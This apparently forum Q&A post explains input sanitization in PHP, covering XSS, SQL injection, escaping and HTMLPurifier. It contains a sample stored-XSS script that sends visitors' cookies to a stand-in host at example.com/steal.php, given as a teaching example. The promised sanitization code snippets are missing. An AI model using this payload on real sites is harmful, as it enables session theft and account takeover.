learn

What is PHP sanitization

category: Ask
Created by: Dr.Ferrous

What is PHP sanitization

category: Ask
Created by: Dr.Ferrous
twitter google+ facebook pinned 

Question:

What is PHP sanitization, as I could not find it here

by CSI

Answer:

Sanitization is not here because it is a concept! and not a feature that is tied to PHP

You can sanitize in C++, Objective-C, Python, Java, Kotlin, JavaScript, MS Word, MS PowerPoint...

Sanitization means cleaning or escaping a value from unwanted or bad content that may put your software/website at risk and vulnerable to exploits.

For example, consider a social network platform where users register and set their names and statuses, and one of the users writes this on his status:

Hello World <script>document.write('<img src="http://www.example.com/steal.php?cookies='+document.cookie+'" />')</script>

Writing this in the browser will not cause any problem and your server will not complain to save the content in your db, but when a user visits and sees that status, he will actually send his cookies to example.com, thus account will be hacked.

This is called XSS and it happens due to a bad or absence of sanitization.

This will hack your users accounts, but how about hacking your entire website because of the absence of sanitization? Yes it's called SQL injection.

 

To protect yourself from SQL injections, I recommend using sanitization and prepared statements.

 

To sanitize that status using PHP's filtering:

 

The output will be:

&#60;script&#62;document.write(&#39;&#60;img src=&#34;http://www.example.com/steal.php?cookies=&#39;+document.cookie+&#39;&#34; /&#62;&#39;)&#60;/script&#62;

It will look the same on browser, but the difference is that browser will treat '<', '>', '"' and other special characters as plain text and not to be parsed as HTML, so the script will not be executed.

 

To sanitize that status using HTMLPurifier:

 

The output will be empty, and thats why I like HTMLPurifier, it removes all scripts which is much better than escaping special characters. And it keeps the content of other tags, but you still need sanitization to protect against SQL injection.

Never save any input to database from users without sanitizing it, or it will insanitize you!